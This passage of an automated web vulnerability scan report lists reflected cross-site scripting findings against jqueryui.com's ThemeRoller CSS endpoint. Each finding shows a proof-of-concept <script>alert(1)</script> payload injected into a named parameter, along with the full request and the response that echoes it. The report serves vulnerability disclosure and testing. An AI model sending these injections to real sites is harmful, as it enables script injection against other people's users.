/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
orderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0ae0185<script>alert(1)</script>0d9e7bc760c
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Helvetica, Arial, sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea,
...[SNIP]...

1.231. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHeader request parameter is copied into the HTML document as plain text between tags. The payload 4b955<script>alert(1)</script>7a2c3ff20fb was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc4b955<script>alert(1)</script>7a2c3ff20fb&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:29 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc4b955<script>alert(1)</script>7a2c3ff20fb&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_s
...[SNIP]...

1.232. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHighlight request parameter is copied into the HTML document as plain text between tags. The payload f5abc<script>alert(1)</script>ccb629bd428 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c98000&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaaf5abc<script>alert(1)</script>ccb629bd428&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:06 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaaf5abc<script>alert(1)</script>ccb629bd428&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a
*/


/* Component containers
----------------------------------*/
.ui-
...[SNIP]...

1.233. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHover request parameter is copied into the HTML document as plain text between tags. The payload 78868<script>alert(1)</script>9f0a3b0a7e1 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?tr&ffDefault=Helvetica,+Arial,+sans-serif&fwDefault=normal&fsDefault=1.1&fsDefaultUnit=em&cornerRadius=5&cornerRadiusUnit=px&bgColorHeader=888888&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=15&borderColorHeader=404040&fcHeader=ffffff&iconColorHeader=cccccc&bgColorContent=121212&bgTextureContent=12_gloss_wave.png&bgImgOpacityContent=16&borderColorContent=404040&fcContent=eeeeee&iconColorContent=bbbbbb&bgColorDefault=adadad&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=35&borderColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c9800078868<script>alert(1)</script>9f0a3b0a7e1&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=404040&fcHighlight=cccccc&iconColorHighlight=aaaaaa&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:12:51 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 17804


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
erColorDefault=cccccc&fcDefault=333333&iconColorDefault=666666&bgColorHover=dddddd&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=60&borderColorHover=dddddd&fcHover=000000&iconColorHover=c9800078868<script>alert(1)</script>9f0a3b0a7e1&bgColorActive=121212&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=15&borderColorActive=000000&fcActive=ffffff&iconColorActive=f29a00&bgColorHighlight=555555&bgTextureHighlight=04_highlight_har
...[SNIP]...

1.234. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd043<script>alert(1)</script>c4492da250c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&cd043<script>alert(1)</script>c4492da250c=1 HTTP/1.1
Accept: */*
Referer: http://jqueryui.com/themeroller/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive
Cookie: __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmb=77982607.2.10.1289873280; __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=77982607

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:11:24 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 16602


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&cd043<script>alert(1)</script>c4492da250c=1
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .u
...[SNIP]...

1.235. http://jqueryui.com/themeroller/css/parseTheme.css.php [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the offsetLeftShadow request parameter is copied into the HTML document as plain text between tags. The payload 50f6b<script>alert(1)</script>2cd38601b35 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px50f6b<script>alert(1)</script>2cd38601b35&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px50f6b<script>alert(1)</script>2cd38601b35&cornerRadiusShadow=5px
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma, Verdana, Arial, sans-serif; font-size: 1.1em; }
.ui-widget inpu
...[SNIP]...

1.236. http://jqueryui.com/themeroller/css/parseTheme.css.php [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the offsetTopShadow request parameter is copied into the HTML document as plain text between tags. The payload 6a5ea<script>alert(1)</script>88149c19cc2 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px6a5ea<script>alert(1)</script>88149c19cc2&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
eOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px6a5ea<script>alert(1)</script>88149c19cc2&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma, Verdana, Arial, sans-serif; font-size: 1.
...[SNIP]...

1.237. http://jqueryui.com/themeroller/css/parseTheme.css.php [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the opacityOverlay request parameter is copied into the HTML document as plain text between tags. The payload 3ac82<script>alert(1)</script>50174dfe896 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=503ac82<script>alert(1)</script>50174dfe896&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:23 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
gonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=503ac82<script>alert(1)</script>50174dfe896&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/


/* Component containe
...[SNIP]...

1.238. http://jqueryui.com/themeroller/css/parseTheme.css.php [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the opacityShadow request parameter is copied into the HTML document as plain text between tags. The payload 9d5c2<script>alert(1)</script>c3400b0d188 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=209d5c2<script>alert(1)</script>c3400b0d188&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:24 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18126


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ror=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=209d5c2<script>alert(1)</script>c3400b0d188&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma,
...[SNIP]...

1.239. http://jqueryui.com/themeroller/css/parseTheme.css.php [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the thicknessShadow request parameter is copied into the HTML document as plain text between tags. The payload 2961c<script>alert(1)</script>86a3d63a4a7 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ffDefault=Trebuchet+MS,+Tahoma,+Verdana,+Arial,+sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px2961c<script>alert(1)</script>86a3d63a4a7&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.3.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:13:25 GMT
Content-Type: text/css
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 18085


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
erlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px2961c<script>alert(1)</script>86a3d63a4a7&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Trebuchet MS, Tahoma, Verdana, Arial, sans
...[SNIP]...

1.240. http://jqueryui.com/themeroller/css/parseTheme.css.php [tr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

